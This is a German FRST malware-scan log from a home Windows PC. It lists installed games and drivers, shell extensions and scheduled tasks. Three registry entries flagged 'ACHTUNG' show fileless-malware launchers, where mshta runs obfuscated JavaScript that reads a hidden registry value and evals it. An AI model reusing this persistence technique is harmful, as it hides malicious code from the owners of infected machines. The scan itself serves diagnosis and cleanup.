Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Keine Datei
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} =>  -> Keine Datei
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-08-04] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation)
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation)
Task: {577763E4-17E6-4D07-A67F-13108AB9872D} - System32\Tasks\Uninstaller_Install_Martin_Walser => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe
Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {6277B01E-8C65-4DE6-9712-35ABEBF90E78} - System32\Tasks\StartMenu8_Start => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe [2016-11-05] ()
Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation)
Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
